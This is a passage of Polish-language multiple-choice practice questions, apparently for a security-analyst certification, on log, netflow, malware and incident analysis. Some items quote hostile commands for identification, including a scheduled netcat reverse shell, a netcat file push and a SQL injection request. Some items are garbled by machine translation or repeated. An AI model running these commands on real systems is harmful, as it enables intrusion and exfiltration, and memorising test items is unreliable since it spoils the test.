D. Nadpisała plik hosts i usunie wszystkie dane z wyjątkiem tego wpisu.
74. Podczas przeglądania danych wyjściowych polecenia netstat John widzi następujące dane wyjściowe. Jakie powinno być jego następne działanie?
[saper.exe]
TCP 127.0.0.1:62522 dynamo:0 LISTENING
[saper.exe]
TCP 192.168.1.100 151.101.2.69: https ESTABLISHED
A. Przechwytuj ruch do 151.101.2.69 za pomocą Wireshark
B. Zainicjuj plan reagowania na incydenty organizacji
C. Sprawdź, czy 151.101.2.69 to prawidłowy adres Microsoft
D. Zignoruj to; to jest fałszywy alarm.
75. Co wykorzystuje EDR do przechwytywania danych do analizy i przechowywania w centralnej bazie danych?
A. Kran sieciowy
B. Przepływy sieciowe
C. Agenci oprogramowania
D. Agenci sprzętu
76. Przeglądając historię poleceń użytkownika administracyjnego, Lakshman odkrywa podejrzane polecenie, które zostało przechwycone:
W /dev/null ~/.bash_history
Jakie działanie próbował wykonać ten użytkownik?
A. Włączanie historii Bash
B. Dołączanie zawartości /dev/null do historii Bash
C. Logowanie wszystkich poleceń powłoki do /dev/null
D. Umożliwienie zdalnego dostępu z powłoki zerowej
77. Karol chce ustalić, czy otrzymana przez niego wiadomość została przekazana, analizując nagłówki wiadomości. Jak może to ustalić?
A. Przeglądanie Message-ID w celu sprawdzenia, czy zostało zwiększone
B. Sprawdzanie pola w odpowiedzi na odpowiedź
C. Sprawdzanie pola Referencje
D. Nie można ustalić, czy wiadomość została przekazana, analizując nagłówki.
78. Podczas przeglądania systemu plików potencjalnie zaatakowanego systemu Marta widzi następujące wyjście podczas uruchamiania ls -la. Jakie powinno być jej następne działanie po zobaczeniu tego?
A. Kontynuuj wyszukiwanie innych zmian
B. Uruchom diff z plikiem haseł
C. Natychmiast zmień jej hasło
D. Sprawdź plik binarny passwd ze znaną dobrą wersją
79. Susan chce sprawdzić system Windows pod kątem nietypowego zachowania. Która z poniższych technik trwałości nie jest również powszechnie używana do uzasadnionych celów?
A. Zaplanowane zadania
B. Wymiana usługi
C. Tworzenie usługi
D. Klucze rejestru autostartu
80. Matt przegląda zapytanie, które jego zespół napisał w związku z procesem polowania na zagrożenia. Przed czym ostrzeże ich następujące zapytanie?
select timeInterval(date, '4h'), `data.login.user`,
count(distinct data.login.machine.name) as machinecount from
network-events where data.winevent.EventID = 4624 having
machinecount > 1
A. Użytkownicy, którzy logują się więcej niż raz dziennie
B. Użytkownicy, którzy są zalogowani na więcej niż jednym komputerze w ciągu czterech godzin
C. Użytkownicy, którzy nie logują się dłużej niż cztery godziny
D. Użytkownicy, którzy nie zalogują się do więcej niż jednego komputera w ciągu czterech godzin
81. Ben chce szybko sprawdzić podejrzany plik binarny pod kątem oznak jego przeznaczenia lub innych informacji, które może zawierać. Jakie narzędzie Linux może szybko pokazać mu potencjalnie przydatne informacje zawarte w pliku?
A. grep
B. more
C. less
D. strings
82. Które z poniższych nie jest ograniczeniem dziury DNS?
A. Nie działają na ruchu wysyłanym bezpośrednio na adres IP.
B. Nie zapobiegają uruchamianiu złośliwego oprogramowania.
C. Można je ominąć za pomocą zakodowanego na stałe serwera DNS.
D. Nie mogą blokować prób drive-by-download.
83. Lucas uważa, że atakujący z powodzeniem włamał się na jego serwer sieciowy. Korzystając z poniższych danych wyjściowych ps, zidentyfikuj identyfikator procesu, na którym powinien się skupić.
root 507 0.0 0.1 258268 3288 ? Ssl 15:52 0:00 /usr/
sbin/rsyslogd -n
message+ 508 0.0 0.2 44176 5160 ? Ss 15:52 0:00 /usr/bin/
dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa
root 523 0.0 0.3 281092 6312 ? Ssl 15:52 0:00 /usr/lib/
accountsservice/accounts-daemon
root 524 0.0 0.7 389760 15956 ? Ssl 15:52 0:00 /usr/
sbin/NetworkManager --no-daemon
root 527 0.0 0.1 28432 2992 ? Ss 15:52 0:00 /lib/
systemd/systemd-logind
apache 714 0.0 0.1 27416 2748 ? Ss 15:52 0:00 /www/
temp/webmin
root 617 0.0 0.1 19312 2056 ? Ss 15:52 0:00 /usr/
sbin/irqbalance --pid=/var/run/irqbalance.pid
root 644 0.0 0.1 245472 2444 ? Sl 15:52 0:01 /usr/
sbin/VBoxService
root 653 0.0 0.0 12828 1848 tty1 Ss+ 15:52 0:00 /sbin/
agetty --noclear tty1 linux
root 507 0.0 0.1 258268 3288 ? Ssl 15:52 0:00 /usr/
sbin/rsyslogd -n
message+ 508 0.0 0.2 44176 5160 ? Ss 15:52 0:00 /usr/bin/
dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa
root 523 0.0 0.3 281092 6312 ? Ssl 15:52 0:00 /usr/lib/
accountsservice/accounts-daemon
root 524 0.0 0.7 389760 15956 ? Ssl 15:52 0:00 /usr/
sbin/NetworkManager --no-daemon
root 527 0.0 0.1 28432 2992 ? Ss 15:52 0:00 /lib/
systemd/systemd-logind
apache 714 0.0 0.1 27416 2748 ? Ss 15:52 0:00 /www/
temp/webmin
root 617 0.0 0.1 19312 2056 ? Ss 15:52 0:00 /usr/
sbin/irqbalance --pid=/var/run/irqbalance.pid
root 644 0.0 0.1 245472 2444 ? Sl 15:52 0:01 /usr/
sbin/VBoxService
root 653 0.0 0.0 12828 1848 tty1 Ss+ 15:52 0:00 /sbin/
agetty --noclear tty1 linux
A. 508
B. 617
C. 846
D. 714
84. Do czego służy protokół Security Content Automation Protocol?
A. Ocena zgodności konfiguracji
B. Testowanie wrażliwych danych podczas przesyłania
C. Testowanie wrażliwych danych w spoczynku
D. Ocena poziomów zagrożenia
85. Damian odkrył, że systemy w całej jego organizacji były zagrożone przez ponad rok przez atakującego dysponującego znacznymi zasobami i technologią. Po miesiącu prób całkowitego usunięcia włamania jego organizacja wciąż znajduje oznaki kompromisu, pomimo ich najlepszych starań. Jak Damian najlepiej zaklasyfikowałby tego aktora-groźby?
A. Kryminalista
B. Haktywista
C. APT
D. Nieznany
86. Podczas dochodzenia w sprawie włamania Glenn napotyka dowody, że konto użytkownika zostało dodane do systemu, który przegląda. Uruchamia pliki różnicowe /etc/shadow i /etc/passwd i widzi następujące wyjście. Co się stało?
root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/
K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999:7:::
> daemon:*:16820:0:99999:7:::
> bin:*:16820:0:99999:7:::
> sys:*:16820:0:99999:7:::
> sync:*:16820:0:99999:7:::
> games:*:16820:0:99999:7:::
> man:*:16820:0:99999:7:::
> lp:*:16820:0:99999:7:::
> mail:*:16820:0:99999:7:::
> news:*:16820:0:99999:7:::
> uucp:*:16820:0:99999:7:::
> proxy:*:16820:0:99999:7:::
> www-data:*:16820:0:99999:7:::
> backup:*:16820:0:99999:7:::
> list:*:16820:0:99999:7:::
> irc:*:16820:0:99999:7:::
A. Konto root zostało naruszone.
B. Dodano konto o nazwie demon.
C. Plik z ukrytymi hasłami został zmodyfikowany.
D. /etc/shadow i /etc/passwd nie mogą być porównywane w celu stworzenia użytecznego porównania.
87. Rick przegląda przepływy systemu w swojej sieci i odkrywa następujące logi przepływów. Co robi system?
ICMP "Echo request"
Date flow start Duration Proto Src IP Addr:Port->Dst IP
Addr:Port Packets Bytes Flows
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.6:8.0 11
924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.6:0->10.1.1.1:0.0 11
924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.7:8.0 11
924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.7:0->10.1.1.1:0.0 11
924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.8:8.0 11
924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.8:0->10.1.1.1:0.0 11
924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.9:8.0 11
924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.9:0->10.1.1.1:0.0 11
924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.10:8.0 11
924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.10:0->10.1.1.1:0.0 11
924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.6:11.0 11
924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.11:0->10.1.1.1:0.0 11
924 1
A. Skanowanie portu
B. Nieudane uzgadnianie trójstronne
C. Przemiatanie ping
D. Trasa
88. Bruce chce zintegrować system bezpieczeństwa ze swoim SOAR. System bezpieczeństwa zapewnia możliwości zapytań w czasie rzeczywistym, a Bruce chce to wykorzystać, aby dostarczyć aktualne dane dla swojego narzędzia SOAR. Jaki rodzaj integracji najlepiej się do tego nadaje?
A. CSV
B. Plik płaski
C. API
D. E-mail
89. Carol chce analizować pocztę elektroniczną w ramach swoich środków antyspamowych i antyphishingowych. W którym z poniższych elementów jest najmniej prawdopodobne oznaki phishingu lub innych ataków opartych na wiadomościach e-mail?
A. Nagłówki wiadomości e-mail
B. Osadzone linki w wiadomości e-mail
C. Załączniki do e-maila
D. Blok podpisów e-mail
90. Przeglądając NetFlows pod kątem systemu w swojej sieci, Alicja odkrywa następujący wzorzec ruchu. Co się dzieje?
Date flow start Duration Proto Src IP Addr:Port->Dst IP Addr:Port
Packets Bytes Flows
2019-07-11 04:59:32.934 0.000 TCP 10.1.1.1:34543->10.2.2.6:22
160 1
2019-07-11 04:59:39.730 0.000 TCP 10.1.1.1:34544->10.2.2.7:22
160 1
2019-07-11 04:59:46.166 0.000 TCP 10.1.1.1:34545->10.2.2.8:22
160 1
2019-07-11 04:59:52.934 0.000 TCP 10.1.1.1:34546->10.2.2.9:22
160 1
2019-07-11 05:00:06.710 0.000 TCP 10.1.1.1:34547->10.2.2.10:22160 1
2019-07-11 05:00:46.160 0.000 TCP 10.1.1.1:34548->10.2.2.11:22160 1
2019-07-11 05:01:32.834 0.000 TCP 10.1.1.1:34549->10.2.2.12:22 160 1
2019-07-11 05:01:39.430 0.000 TCP 10.1.1.1:34550->10.2.2.13:22160 1
2019-07-11 05:01:46.676 0.000 TCP 10.1.1.1:34551->10.2.2.14:22160 1
A. Skanowanie telnet
B. Skan SSH
C. Skanowanie SSH przy nieudanych próbach połączenia
D. Skanowanie SFTP z nieudanymi próbami połączenia
91. Ric pracuje nad inżynierią wsteczną próbki złośliwego oprogramowania i chce uruchomić plik binarny, ale także kontrolować jego wykonanie. Jakie narzędzie powinien do tego wybrać?
A. Deasembler
B. Dekompilator
C. Debuger
D. Rozpakowujący
92. Jennifer chce wyszukać terminy, w tym "CySA+" i wszystkie inne odmiany tekstu, niezależnie od tego, które litery mogą być pisane wielkimi literami. Które z poniższych poleceń znajdzie wszystkie terminy pasujące do tego, czego szuka w pliku tekstowym o nazwie przykład.txt?
A. grep -i cysa+ przykład.txt
B. grep -uc CySA+ przykład.txt
C. grep -case cysa+ przykład.txt
D. grep przykład.txt cysa+
93. Juliette chce zmniejszyć ryzyko osadzania linków w wiadomościach e-mail. Które z poniższych rozwiązań jest najczęstszą metodą wykonania tego?
A. Usuwanie wszystkich linków w wiadomości e-mail
B. Przekierowanie linków w wiadomości e-mail do serwera proxy
C. Skanowanie wszystkich wiadomości e-mail za pomocą narzędzia antymalware
D. Korzystanie z czarnej dziury DNS i listy reputacji IP
94. James chce użyć automatycznego narzędzia do tworzenia sygnatur złośliwego oprogramowania. W jakim środowisku narzędzia takie jak to rozpakowują i uruchamiają złośliwe oprogramowanie?
A. Piaskownica
B. Fizyczna maszyna
C. Pojemnik
D. DMARC
95. Śledząc potencjalne APT w swojej sieci, Cynthia odkrywa przepływ sieciowy dla centralnego serwera plików swojej firmy. Co najprawdopodobniej pokazuje ten wpis przepływu, jeśli 10.2.2.3 nie jest systemem w jej sieci?
Date flow start Duration Proto Src IP Addr:Port Dst IP
Addr:Port Packets Bytes Flows
2019-07-11 13:06:46.343 21601804 TCP 10.1.1.1:1151->10.2.2.3:443
9473640 9.1 G 1
2019-07-11 13:06:46.551 21601804 TCP 10.2.2.3:
443->10.1.1.1:11518345101 514 M 1
A. Sesja przeglądania stron internetowych
B. Eksfiltracja danych
C. Infiltracja danych
D. Skan podatności
96. Luis odkrywa następujące wpisy w /var/log/auth.log. Co się najprawdopodobniej dzieje?
Aug 6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11
port 38460 ssh2
Aug 6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11
port 38452 ssh2
Aug 6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11
port 38474 ssh2
Aug 6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11
port 38446 ssh2
Aug 6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11
port 38454 ssh2
Aug 6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11
port 38448 ssh2
Aug 6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11
port 38444 ssh2
Aug 6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11
port 38463 ssh2
Aug 6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11
port 38478 ssh2
Aug 6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11
port 38476 ssh2
A. Użytkownik zapomniał swojego hasła
B. Atak brute-force na konto root
C. Źle skonfigurowana usługa
D. Atak typu "odmowa usługi" na konto root
97. Singh chce zapobiec atakom zdalnego logowania na konto root w systemie Linux. Jaka metoda powstrzyma takie ataki, jednocześnie umożliwiając zwykłym użytkownikom korzystanie z SSH?
A. Dodaj regułę iptables blokującą logowanie root
B. Dodaj root do grupy sudoers
C. Zmień sshd_config, aby odmówić logowania root
D. Dodaj regułę sieci IPS, aby zablokować logowanie root
98. Zapora sieciowa Azra odrzuca cały ruch przychodzący, ale przepuszcza cały ruch wychodzący. Badając stację roboczą z systemem Windows, napotyka skrypt, który uruchamia następujące polecenie.
o \\workstation10 20:30 co:F nc -nv 10.1.2.3 443 -e cmd.exe
Co to robi?
A. Otwiera odwróconą powłokę dla hosta 10.1.2.3 używając netcata w każdy piątek o 8:30.
B. Używa polecenia AT do wybierania zdalnego hosta przez NetBIOS.
C. Tworzy sesję HTTPS do 10.1.2.3 w każdy piątek o 8:30.
D. Tworzy połączenie VPN do 10.1.2.3 co pięć dni o 8:30 GST.
99. Podczas przeglądania pliku auth.log w systemie Linux, za który jest odpowiedzialna, Tiffany odkrywa następujące wpisy w dzienniku:
Aug 6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures;
logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root
Aug 6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries;
6 > 3
Aug 6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1
port 38463 ssh2
Aug 6 14:13:07 demo sshd[5280]: error: maximum authentication attempts
exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth]
Aug 6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication
failures [preauth]
Które z poniższych nie miało miejsca?
A. Użytkownik zbyt wiele razy próbował ponownie się uwierzytelnić.
B. PAM jest skonfigurowany na trzy próby i odrzuci wszelkie dodatkowe próby w tej samej sesji.
C. Fail2ban zablokował próby logowania SSH.
D. Root próbuje zalogować się przez SSH z lokalnego hosta.
100. Fred otrzymał zadanie skonfigurowania reguł NAC swojej organizacji, aby zapewnić, że pracownicy mają tylko dostęp, który pasuje do ich funkcji zawodowych. Które z poniższych kryteriów NAC są najmniej odpowiednie do filtrowania na podstawie zadania użytkownika?
A. Na podstawie czasu
B. Oparte na regułach
C. Oparte na rolach
D. Na podstawie lokalizacji
101. Naomi chce analizować złośliwe oprogramowanie, uruchamiając je i rejestrując to, co robi. Jakiego narzędzia powinna użyć?
A. Narzędzie do konteneryzacji
B. Narzędzie do wirtualizacji
C. Narzędzie piaskownicy
D. Analizator pakietów
102. Przeglądając dzienniki użytkowników z uprawnieniami roota w administracyjnym polu skoku, Alex odkrywa następujące podejrzane polecenie:
nc -l -p 43501 < przykład.zip
Co się stało?
A. Użytkownik skonfigurował odwrotną powłokę działającą jako example.zip.
B. Użytkownik skonfiguruje netcata jako słuchacza, aby wypchnąć plik example.zip.
C. Użytkownik skonfigurował zdalną powłokę działającą jako example.zip.
D. Użytkownik skonfigurował netcat do otrzymywania pliku example.zip.
103. Susan poluje na zagrożenia i wykonuje następujące zapytanie w swojej bazie danych partii zdarzeń. Jakiego rodzaju zagrożenia szuka? Wybierz source.name, destination.name, count(*) z zdarzeń sieciowych, gdzie destination.port = '3389'
A. SSH
B. MySQL
C. PROW
D. IRC
104. W którym momencie w potoku ciągłej integracji (CI)/ciągłego dostarczania (CD) należy przeprowadzać testy bezpieczeństwa?
A. Po wpisaniu kodu do repozytorium
B. Po wdrożeniu kodu w zautomatyzowanym środowisku testowym
C. Po wdrożeniu kodu w środowisku produkcyjnym
D. Wszystkie powyższe
105. Lukas chce uniemożliwić użytkownikom uruchamianie popularnej gry na stacjach roboczych z systemem Windows, za które odpowiada. Jak Lukas może to osiągnąć na stacjach roboczych z systemem Windows 10 Pro?
A. Korzystanie z białej listy aplikacji w celu zapobiegania uruchamianiu wszystkich zabronionych programów
B. Korzystanie z programu Windows Defender i dodanie gry do pliku czarnej listy
C. Umieszczenie go na liście zablokowanych programów za pośrednictwem secpol.msc
D. Nie możesz umieszczać aplikacji na czarnej liście w systemie Windows 10 bez aplikacji innej firmy
106. Podczas przeglądania swoich dzienników Apache, Oscar odkrywa następujący wpis. Co się stało?
10.1.1.1 - - [27.06.2019:11:42:22 -0500] "GET
/query.php?searchterm=stuff&%20lid=1%20UNION%20SELECT%200,
nazwa użytkownika,identyfikator_użytkownika,hasło,nazwa,%20e-mail,%20FROM%20użytkowników
HTTP/1.1" 200 9918 "-" "Mozilla/4.0 (kompatybilna; MSIE 6.0;
Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
A. Udane zapytanie do bazy danych
B. Atak przepełnienia php
C. Atak wstrzykiwania SQL
D. Nieudane zapytanie do bazy danych
107. Jason chce dokonać inżynierii wstecznej pakietu złośliwego oprogramowania. Którego z poniższych narzędzi powinien użyć, jeśli chce przeprowadzić analizę behawioralną robaka?
A. Deasembler
B. Analizator sieci
C. Widz WF
D. Debuger
108. Co zrobi wyszukiwanie za pomocą następującego polecenia?
grep -n -i -v mikrofon *
A. Wymień wszystkie wiersze, w których pojawia się słowo Mike, niezależnie od wielkości liter we wszystkich plikach w bieżącym katalogu
B. Przeszukaj wszystkie pliki ze słowem mikrofon w nazwie pliku, aby znaleźć słowa pisane małymi literami
C. Wyszukaj w pliku o nazwie mike wszystkie słowa pisane wielkimi literami
D. Wymień wszystkie wiersze, w których słowo Mike nie pojawia się, niezależnie od wielkości liter, we wszystkich plikach w bieżącym katalogu
109. Ian wymienia uprawnienia do pliku Linuksa, który jego zdaniem mógł zostać zmodyfikowany przez atakującego. Co oznaczają pokazane tutaj uprawnienia?
-rwxrw-r&-1 grupa administracyjna uchwytu 1232 28 lutego 16:22 mojplik.txt
A. Uchwyt użytkownika ma prawa odczytu i zapisu do pliku; grupa administrators ma prawa do odczytu, zapisu i wykonywania; a wszyscy pozostali użytkownicy mają tylko prawa do odczytu.
B. User admingroup ma uprawnienia do odczytu; grupowy uchwyt ma prawa do odczytu i zapisu; a wszyscy użytkownicy w systemie mogą odczytywać, zapisywać i uruchamiać plik.
C. Uchwyt użytkownika ma uprawnienia do odczytu, zapisu i wykonywania na pliku. Członkowie grupy admingroup mogą czytać i zapisywać do pliku, ale nie mogą go wykonywać, a wszyscy użytkownicy w systemie mogą czytać plik.
D. Użytkownik admingroup ma uprawnienia do odczytu, zapisu i wykonywania na pliku; uchwyt użytkownika ma uprawnienia do odczytu i zapisu; a wszyscy pozostali użytkownicy mają prawa do odczytu pliku.
110. Podczas przeglądania dzienników serwera WWW Danielle zauważa następujący wpis. Co się stało?
10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.
php&theme= total 200
A. Temat został zmieniony
B. Nie znaleziono pliku
C. Próba edycji strony 404
D. Wyświetlono stronę 404
111. Melissa chce wdrożyć narzędzie do koordynowania informacji z wielu różnych platform, aby mogła je zobaczyć w centralnej lokalizacji, a następnie zautomatyzować odpowiedzi w ramach przepływów pracy związanych z bezpieczeństwem. Jakie narzędzie powinna wdrożyć?
A. UEBA
B. SOAR
C. SIEM
D. MDR
112. Próbując zatrzymać nieuczciwą usługę, Monica wydaje następujące polecenie Linuksa w systemie Ubuntu za pomocą upstartu:
usługa rogueservice stop
Po ponownym uruchomieniu odkrywa, że usługa działa ponownie. Co się stało i co musi zrobić, aby temu zapobiec?
A. Usługa została ponownie uruchomiona przy ponownym uruchomieniu, więc musi dołączyć flagę -p, czyli permanent.
B. Usługa zrestartowała się sama, więc musi usunąć plik binarny powiązany z usługą.
C. Usługa została ponownie uruchomiona przy ponownym uruchomieniu, więc powinna dodać plik .override, aby zatrzymać uruchomienie usługi.
D. Złośliwy użytkownik ponownie uruchomił usługę, więc musi upewnić się, że użytkownicy nie mogą ponownie uruchamiać usług.
113. Dlaczego Mark może zdecydować się na wdrożenie IPS zamiast IDS?
A. IPS może wykrywać ataki, których nie potrafi IDS.
B. IPS oprócz zgłaszania ataków może blokować ataki.
C. IPS może wykorzystywać analizę heurystyczną.
D. IPS może wykorzystywać analizę opartą na sygnaturach.
114. Podczas przeglądania pokazanego tutaj przechwytywania pakietów Wireshark, Ryan zauważa rozszerzoną sesję przy użyciu protokołu ESP. Kiedy klika na pakiety, nie jest w stanie zrozumieć treści. Czego Ryan powinien szukać na stacji roboczej z adresem IP 10.0.0.1, jeśli sprawdzi to osobiście?
A. Zaszyfrowany RAT
B. Aplikacja VPN
C. Bezpieczna przeglądarka internetowa
D. Narzędzie do przesyłania pakietów zakodowane w base64
115. Bohai używa następującego polecenia podczas badania stacji roboczej Windows używanej przez wiceprezesa ds. finansów swojej organizacji, który pracuje tylko w normalnych godzinach pracy. Bohai uważa, że stacja robocza była używana bez pozwolenia przez członków personelu sprzątającego jego organizacji po godzinach. Co on wie, jeśli wyświetlony identyfikator użytkownika jest jedynym identyfikatorem użytkownika, który może zalogować się do systemu, a prowadzi dochodzenie 12 sierpnia 2019 r.?
C:\Users\bigfish>wmic netlogin get name,lastlogon,badpasswordcount
BadPasswordCount LastLogon Name
NT AUTHORITY\SYSTEM
0 20190811203748.000000-240 Finance\bigfish
A. Konto zostało naruszone.
B. Brak logowań.
C. Ostatnie logowanie miało miejsce w godzinach pracy.
D. Bohai nie może dokonywać żadnych ustaleń na podstawie tych informacji.
116. Po tym, jak seria zhakowanych kont doprowadziła do umieszczenia jej domeny na czarnej liście, Wang została poproszona o jak najszybsze przywrócenie firmowej poczty e-mail. Która z poniższych opcji nie jest prawidłowym sposobem umożliwienia jej firmie pomyślnego wysyłania wiadomości e-mail?
A. Przenieś serwery SMTP swojej firmy na nowe adresy IP.
B. Przeprowadź migrację do dostawcy hostingu poczty e-mail w chmurze.
C. Zmień nagłówki SMTP, aby zapobiec umieszczaniu na czarnej liście.
D. Współpracuj z organizacjami z czarnej listy, aby usunąć je z listy.
117. Przeglądając wskaźniki narażenia, Dustin zauważa, że notepad.exe otworzył port nasłuchiwania na badanym komputerze z systemem Windows. Jaki jest ten przykład?
A. Zachowanie anomalne
B. Zachowanie heurystyczne
C. Zachowanie podmiotu
D. Znane dobre zachowanie
118. Śledząc potencjalne APT w swojej sieci, Cynthia odkrywa przepływ sieciowy dla centralnego serwera plików swojej firmy. Co najprawdopodobniej pokazuje ten wpis przepływu, jeśli 10.2.2.3 nie jest systemem w jej sieci?
Początek przepływu daty Czas trwania Proto Src IP Addr:Port Dst IP
Addr:Przepływ bajtów pakietów portu
2019-07-11 13:06:46.343 21601804 TCP 10.1.1.1:1151->10.2.2.3:443
9473640 9,1 G 1
2019-07-11 13:06:46.551 21601804 TCP 10.2.2.3:
443->10.1.1.1:11518345101 514 M 1
A. Sesja przeglądania stron internetowych
B. Eksfiltracja danych
C. Infiltracja danych
D. Skan podatności
119. Czym wzbogacanie danych różni się od kombinacji źródła danych o zagrożeniach?
A. Wzbogacanie danych jest formą połączenia źródeł danych o zagrożeniach w celu uzyskania wglądu w zabezpieczenia, skupia się na dodawaniu razem większej liczby źródeł danych o zagrożeniach, aby uzyskać pełny obraz, i usuwa dane innych firm, aby skupić się na podstawowych elementach danych, a nie na łączeniu wielu źródeł danych.
B. Wzbogacanie danych wykorzystuje zdarzenia i informacje o żadnych zdarzeniach, aby poprawić wgląd w zabezpieczenia, zamiast po prostu łączyć informacje o zagrożeniach.
C. Kombinacja danych o zagrożeniach jest bardziej użyteczna niż wzbogacanie danych, ponieważ koncentruje się wyłącznie na zagrożeniach.
D. Techniki łączenia plików danych o zagrożeniach są dojrzałe, a wzbogacanie danych nie jest gotowe do użytku w przedsiębiorstwach.
120. Isaac chce uniemożliwić hostom łączenie się ze znanymi domenami dystrybucji złośliwego oprogramowania. Jakiego rodzaju rozwiązania może użyć, aby to zrobić bez wdrażania oprogramowania do ochrony punktów końcowych lub IPS?
A. Zatrucie trasy
B. Filtry routera chroniące przed złośliwym oprogramowaniem
C. Biała lista subdomen
D. Blackholing DNS
121. Lucca chce zapobiec wzajemnemu atakowaniu się stacji roboczych w swojej sieci. Jeśli sieć korporacyjna firmy Lucca wygląda jak ta pokazana tutaj, jaką technologię powinien wybrać, aby uniemożliwić laptopowi A atakowanie stacji roboczej B?
A. IPS
B. IDS
C. BIODRA
D. HIDS
122. Atakujący próbowali zalogować się do routerów Cisco Alainy, powodując tysiące wpisów w dzienniku, a ona obawia się, że w końcu im się to uda. Którą z poniższych opcji powinna zalecić, aby rozwiązać ten problem?
A. Zapobiegaj logowaniu do konsoli przez SSH
B. Zaimplementuj funkcję blokowania logowania z ustawieniami wycofywania
C. Przenieś interfejs administracyjny do chronionej sieci
D. Całkowicie wyłącz dostęp do konsoli
123. Kolektor NetFlow, z którego korzysta zespół bezpieczeństwa Sama, jest w stanie obsłużyć 1 gigabit ruchu na sekundę. Wraz z rozwojem organizacji Sama zwiększyła swoje zewnętrzne połączenie sieciowe do 2 gigabitów na sekundę i zaczęła zbliżać się do pełnego wykorzystania w różnych porach dnia. Jeśli zespół Sama nie ma nowych pieniędzy z budżetu na zakup bardziej wydajnego kolekcjonera, jakiej opcji może użyć Sam, aby nadal gromadzić przydatne dane?
A. Włącz QoS
B. Włącz kompresję NetFlow
C. Włącz próbkowanie
D. Żadne z powyższych
124. Co roku Alice pobiera i czyta opublikowaną przez branżę bezpieczeństwa listę wszystkich rodzajów ataków, włamań i zdarzeń związanych ze złośliwym oprogramowaniem, które mają miejsce, a ich występowanie jest coraz częstsze. Jaki rodzaj analizy może przeprowadzić, korzystając z tych informacji?
A. Anomalia
B. Trend
C. Heurystyka
D. Dostępność
125. Która z poniższych możliwości nie jest typową częścią systemu SIEM?
A. Alarmowanie
B. Zarządzanie wydajnością
C. Agregacja danych
D. Przechowywanie dzienników
126. Kathleen chce regularnie sprawdzać, czy plik nie uległ zmianie w systemie, za który jest odpowiedzialna. Która z poniższych metod najlepiej się do tego nadaje?
A. Użyj sha1sum, aby wygenerować hash dla pliku i napisz skrypt, aby okresowo go sprawdzać
B. Zainstaluj i użyj Tripwire
C. Okresowo sprawdzaj informacje o adresie MAC pliku za pomocą skryptu
D. Zaszyfruj plik i zachowaj klucz w tajemnicy, aby nie można było modyfikować pliku
127. Maria chce wdrożyć narzędzie antymalware do wykrywania złośliwego oprogramowania typu zero-day. Jakiej metody wykrywania powinna szukać w wybranym przez siebie narzędziu?
A. Oparte na podpisie
B. Oparte na heurystyce
C. Oparte na trendach
D. Na podstawie dostępności
128. Alaina skonfigurowała swój system SOAR do wykrywania nieprawidłowości w informacjach geograficznych dotyczących logowania do systemów administracyjnych jej organizacji. System alarmuje, zauważając, że administrator zalogował się z lokalizacji, z której zwykle się nie loguje. Jakie inne informacje byłyby najbardziej przydatne do skorelowania z tym, aby ustalić, czy logowanie stanowi zagrożenie?
A. Anomalie w korzystaniu z kont uprzywilejowanych
B. Informacje logowania oparte na czasie
C. Zmiana profilu urządzenia mobilnego
D. Anomalie żądań DNS
129. Miguel pracuje dla firmy, która ma standard bezpieczeństwa sieci wymagający gromadzenia i przechowywania dzienników NetFlow ze wszystkich sieci centrów danych. Miguel pracuje nad uruchomieniem nowej sieci centrum danych, ale z powodu ograniczeń technicznych nie będzie w stanie zbierać dzienników NetFlow przez pierwsze sześć miesięcy działania. Które z poniższych źródeł danych najlepiej nadaje się jako kontrola kompensująca brak informacji NetFlow?
A. Dzienniki routera
B. Dzienniki zapory
C. Przełącz dzienniki
D. Dzienniki IPS
130. Megan chce sprawdzić wykorzystanie pamięci w systemie Macintosh. Jakiego narzędzia Apple może użyć do tego?
A. Monitor aktywności
B. Kontrola pamięci
C. Uruchom memstat z wiersza poleceń
D. Uruchom memctl z wiersza poleceń
131. Który z poniższych składników nie jest zwykle częścią pakietu bezpieczeństwa punktów końcowych?
A. IPS
B. Zapora sieciowa
C. Antymalware
D. VPN
132. Joan pracuje jako konsultant ds. bezpieczeństwa w firmie, która prowadzi krytyczną aplikację internetową. Odkryła, że aplikacja ma poważną podatność na wstrzyknięcie SQL, ale firma nie może wyłączyć systemu w ciągu dwóch tygodni wymaganych do zrewidowania kodu. Która z poniższych technologii służyłaby jako najlepsza kontrola kompensacji?
A. IPS
B. WAF
C. Skanowanie podatności
D. Szyfrowanie
